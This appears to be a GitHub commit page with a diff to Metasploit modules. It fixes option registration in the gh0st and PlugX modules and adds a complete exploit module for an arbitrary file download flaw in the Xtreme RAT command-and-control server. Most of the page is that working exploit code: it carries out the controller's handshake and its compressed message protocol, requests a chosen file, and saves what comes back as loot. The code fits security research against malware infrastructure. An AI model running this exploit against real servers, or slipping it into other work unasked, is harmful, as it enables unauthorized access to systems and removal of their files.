Fixed to modules as suggested from upstream

Professor-plum · web-flow · commit 055d64d32b9c · 2017-07-30T10:14:05.000-06:00
fixed typo in xtreme.rb when communicating with C&amp;C
removed self.class from options on all three modules
added line to log path where loot has been stored in xtreme.rb
diff --git a/modules/exploits/windows/misc/gh0st.rb b/modules/exploits/windows/misc/gh0st.rb
@@ -44,7 +44,7 @@ def initialize(info = {})
       [
         OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),
         Opt::RPORT(80)
-      ], self.class
+      ]
     )
   end
 
diff --git a/modules/exploits/windows/misc/plugx.rb b/modules/exploits/windows/misc/plugx.rb
@@ -46,7 +46,7 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(13579)
-      ], self.class
+      ]
     )
   end
 
diff --git a/modules/exploits/windows/misc/xtreme.rb b/modules/exploits/windows/misc/xtreme.rb
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zlib'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xtreme Rat Controller Remote File Download Exploit',
+      'Description'    => %q{
+          This module exploits an arbitrary file download vulnerability in the Xtreme C&C server
+      },
+      'Author'         => 'Professor Plum',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+        ],
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Jul 27 2017',
+      'Targets'        =>
+        [
+          ['Xtreme RAT 3.6', { 'Ver' => '3.6' }],
+          ['Xtreme RAT 3.7', { 'Ver' => '3.7' }]
+        ],
+      'Privileged'     => false,
+      'DefaultTarget' => 1))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETFILE', [true, 'Target file to download', 'user.info'])
+      ]
+    )
+  end
+
+  @delm = "\xc2\x00\xaa\x00\xc2\x00\xaa\x00\xc2\x00\xaa\x00#\x00#\x00#\x00\xe2\x00\" a\x01\xe2\x00\" a\x01\xe2\x00\" a\x01".force_encoding('utf-16le')
+  @password = ''
+  @conid = ''
+
+  def validate(b)
+    if b != "X\r\n"
+      print_status(b.inspect)
+      return false
+    end
+    true
+  end
+
+  def check
+    connect
+    sock.put("myversion|#{target['Ver']}\r\n")
+    if validate(sock.recv(3))
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def make_string(cmd, msg)
+    pp = (cmd + @delm + msg)
+    pack = Zlib::Deflate.deflate(pp)
+    return @password + [pack.size, 0].pack('<II') + pack
+  end
+
+  def read_string(sock)
+    d = sock.recv(16)
+    if d.size < 16
+      print_status("Didn't receive full packet!")
+      return
+    end
+    @password = d[0..7]
+    size = d[8..12].unpack('<I')[0]
+    d = ''
+    while d.size < size
+      d += sock.get_once(size - d.size)
+    end
+    if d.size != size
+      print_status("Bad response! #{d.size} != #{size}")
+      return
+    end
+    msg = Zlib::Inflate.inflate(d).force_encoding('utf-16le')
+    cmd, data = msg.split(@delm)
+    # print_status("#{cmd.inspect} | #{data.inspect}")
+    if 'maininfo'.encode('utf-16le') == cmd
+      @conid = data
+    end
+    if 'updateserverlocal'.encode('utf-16le') == cmd
+      fsize = data.encode('binary').to_i
+      fdata = ''
+      while fdata.size < fsize
+        fdata += sock.get_once(fsize - fdata.size)
+      end
+      print_status("Received file #{datastore['TARGETFILE']}!")
+      # print_status(fdata.inspect)
+      path = store_loot('xtremeRat.file', 'text/plain', datastore['RHOST'], fdata, datastore['TARGETFILE'], 'File retrieved from Xtreme C2 server')
+      print_good("File saved in: #{path}")
+    end
+  end
+
+  def exploit
+    print_status("Trying target #{target.name}...")
+
+    connect
+    sock.put("myversion|#{target['Ver']}\r\n")
+    unless validate(sock.get_once(3))
+      print_status('Server did not Ack hello')
+      return
+    end
+    read_string(sock)
+
+    print_status('Sending request')
+    sock.put(make_string('newconnection|'.encode('utf-16le') + @conid + @delm + 'updateserverlocal'.encode('utf-16le'), datastore['TARGETFILE'].encode('utf-16le')))
+    unless validate(sock.get_once(3))
+      print_status('Server did not Ack message')
+      return
+    end
+    read_string(sock)
+    disconnect
+  end
+end

Original file line number	Diff line number	Diff line change
`@@ -44,7 +44,7 @@ def initialize(info = {})`
`44`	`44`	`[`
`45`	`45`	`OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),`
`46`	`46`	`Opt::RPORT(80)`
`47`		`- ], self.class`
	`47`	`+ ]`
`48`	`48`	`)`
`49`	`49`	`end`
`50`	`50`
Original file line number	Diff line number	Diff line change
`@@ -46,7 +46,7 @@ def initialize(info = {})`
`46`	`46`	`register_options(`
`47`	`47`	`[`
`48`	`48`	`Opt::RPORT(13579)`
`49`		`- ], self.class`
	`49`	`+ ]`
`50`	`50`	`)`
`51`	`51`	`end`
`52`	`52`